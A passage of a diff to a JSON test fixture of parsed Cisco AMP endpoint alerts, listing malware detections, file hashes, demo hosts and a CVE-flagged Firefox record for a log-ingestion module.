"input.type": "log", - "log.offset": 294937, + "log.offset": 43310, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -5287,50 +1679,62 @@ ] }, { - "@timestamp": "2021-01-15T10:10:59.000Z", + "@timestamp": "2021-01-15T10:20:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "f5:8f:96:c3:53:1c" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.event_type_id": 1107296272, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.related.cve": [ + "CVE-2015-7204" + ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "f5:8f:96:c3:53:1c" ], - "cisco.amp.timestamp_nanoseconds": 267000000, - "event.action": "Executed malware", + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2015-7204", + "name": "Mozilla Firefox", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204", + "version": "41.0" + } + ], + "event.action": "Vulnerable Application Detected", "event.category": [ - "malware" + "file" ], "event.dataset": "cisco.amp", - "event.id": 1489955900267000300, + "event.id": 15210587194928, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:10:59.000Z", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "event.severity": 1, + "event.start": "2021-01-15T10:20:00.000Z", + "file.hash.sha256": "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f", + "file.name": "firefox.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", + "host.hostname": "Demo_AMP_Exploit_Prevention", + "host.name": "Demo_AMP_Exploit_Prevention", "input.type": 
"log", - "log.offset": 296255, - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", + "log.offset": 44629, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5" + "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Exploit_Prevention" ], "related.ip": [ "8.8.8.8", 
@@ -5343,60 +1747,66 @@ ] }, { - "@timestamp": "2021-01-15T10:10:56.000Z", + "@timestamp": "2021-01-15T10:19:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257357849296955", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669409347600427", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 607000000, + "cisco.amp.timestamp_nanoseconds": 257000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257357849297000, + "event.id": 6533669409347600000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + 
"host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 297536, + "log.offset": 46087, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5404,7 +1814,7 @@ ] }, { - "@timestamp": "2021-01-15T10:10:53.000Z", + "@timestamp": "2021-01-15T10:19:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -5416,7 +1826,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667064295456780", + "cisco.amp.detection_id": "6533669409347600426", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -5425,14 +1835,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 478000000, + "cisco.amp.timestamp_nanoseconds": 240000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667064295457000, + "event.id": 6533669409347600000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, 
@@ -5440,15 +1850,13 @@ "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 298855, + "log.offset": 47413, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", 
@@ -5471,60 +1879,64 @@ ] }, { - "@timestamp": "2021-01-15T10:10:52.000Z", + "@timestamp": "2021-01-15T10:19:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257340669427770", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669405052633129", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 988000000, + "cisco.amp.timestamp_nanoseconds": 847000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257340669428000, + "event.id": 6533669405052633000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", 
"input.type": "log", - "log.offset": 300181, + "log.offset": 48732, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5532,7 +1944,7 @@ ] }, { - "@timestamp": "2021-01-15T10:10:51.000Z", + "@timestamp": "2021-01-15T10:18:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -5543,8 +1955,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667055705522187", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669147354595368", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -5553,14 +1965,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 565000000, + "cisco.amp.timestamp_nanoseconds": 375000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667055705522000, + "event.id": 6533669147354595000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -5576,7 +1988,7 @@ "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 301500, + "log.offset": 50051, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", 
@@ -5599,64 +2011,56 @@ ] }, { - "@timestamp": "2021-01-15T10:10:11.000Z", + "@timestamp": "2021-01-15T10:18:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "b2:4b:d5:c2:a6:9f" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "ZBot:FakeAlert-tpd", - "cisco.amp.detection_id": "5832268410590855181", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669147354595367", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Unknown", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "b2:4b:d5:c2:a6:9f" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 13000000, + "cisco.amp.timestamp_nanoseconds": 360000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5832268414885822000, + "event.id": 6533669147354595000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e74f1b3fffc4ae61e077bbdec3230e95", - "file.hash.sha1": "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5", - "file.hash.sha256": "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "file.name": "2_3756858138.exe", - "file.path": "\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Zbot", - "host.name": "Demo_Zbot", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": 
"Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 302825, - "process.hash.md5": "9a2e18cb348feb772d02fb8f8728ab82", - "process.hash.sha1": "5df10f3387f7ff512e420240f81bde68a2b4c7aa", - "process.hash.sha256": "0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f", - "process.name": "a.exe", - "process.pid": 3020, + "log.offset": 51377, "related.hash": [ - "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "e74f1b3fffc4ae61e077bbdec3230e95", - "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Zbot" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", 
@@ -5672,64 +2076,56 @@ ] }, { - "@timestamp": "2021-01-15T10:10:10.000Z", + "@timestamp": "2021-01-15T10:18:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "b2:4b:d5:c2:a6:9f" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "ZBot:FakeAlert-tpd", - "cisco.amp.detection_id": "5832268410590855180", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669143059628070", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Unknown", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "b2:4b:d5:c2:a6:9f" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 810000000, + "cisco.amp.timestamp_nanoseconds": 968000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5832268410590855000, + "event.id": 6533669143059628000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e74f1b3fffc4ae61e077bbdec3230e95", - "file.hash.sha1": "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5", - "file.hash.sha256": "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "file.name": "2_3756858138.exe", - "file.path": "\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Zbot", - "host.name": "Demo_Zbot", - "host.os.family": "windows", - "host.os.platform": 
"windows", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 304431, - "process.hash.md5": "9a2e18cb348feb772d02fb8f8728ab82", - "process.hash.sha1": "5df10f3387f7ff512e420240f81bde68a2b4c7aa", - "process.hash.sha256": "0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f", - "process.name": "a.exe", - "process.pid": 3020, + "log.offset": 52696, "related.hash": [ - "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "e74f1b3fffc4ae61e077bbdec3230e95", - "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Zbot" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5745,7 +2141,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:53.000Z", + "@timestamp": "2021-01-15T10:18:25.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -5757,7 +2153,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257087266357305", + "cisco.amp.detection_id": "6176259286289612895", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -5766,14 +2162,14 @@ "cisco.amp.related.mac": [ "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 942000000, + "cisco.amp.timestamp_nanoseconds": 669000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257087266357000, + "event.id": 6176259286289613000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, 
@@ -5786,7 +2182,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 307596, + "log.offset": 54015, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", 
@@ -5806,129 +2202,60 @@ ] }, { - "@timestamp": "2021-01-15T10:09:51.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666798007484426", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 469000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533666798007484000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 308915, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:09:50.000Z", + "@timestamp": "2021-01-15T10:18:13.000Z", "cisco.amp.computer.active": true, 
"cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "23:d5:92:eb:f8:9b" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666793712517128", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259234750005342", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" + "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 948000000, + "cisco.amp.timestamp_nanoseconds": 657000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666793712517000, + "event.id": 6176259234750005000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 311551, + "log.offset": 55334, "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - 
"b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Dyre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -5936,72 +2263,60 @@ ] }, { - "@timestamp": "2021-01-15T10:09:48.000Z", + "@timestamp": "2021-01-15T10:18:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "23:d5:92:eb:f8:9b" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666785122582535", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259183210397789", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" + "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 372000000, + "cisco.amp.timestamp_nanoseconds": 645000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666785122583000, + "event.id": 6176259183210398000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": 
"windows", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 312869, - "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", - "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "process.name": "rundll32.exe", - "process.pid": 596, + "log.offset": 56653, "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Dyre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -6009,60 +2324,72 @@ ] }, { - "@timestamp": "2021-01-15T10:09:42.000Z", + "@timestamp": "2021-01-15T10:17:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257040021717048", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6180335966167760897", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "e1:e5:94:ea:a5:44" ], - "cisco.amp.timestamp_nanoseconds": 304000000, + "cisco.amp.timestamp_nanoseconds": 875000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257040021717000, + "event.id": 6180335966167761000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": 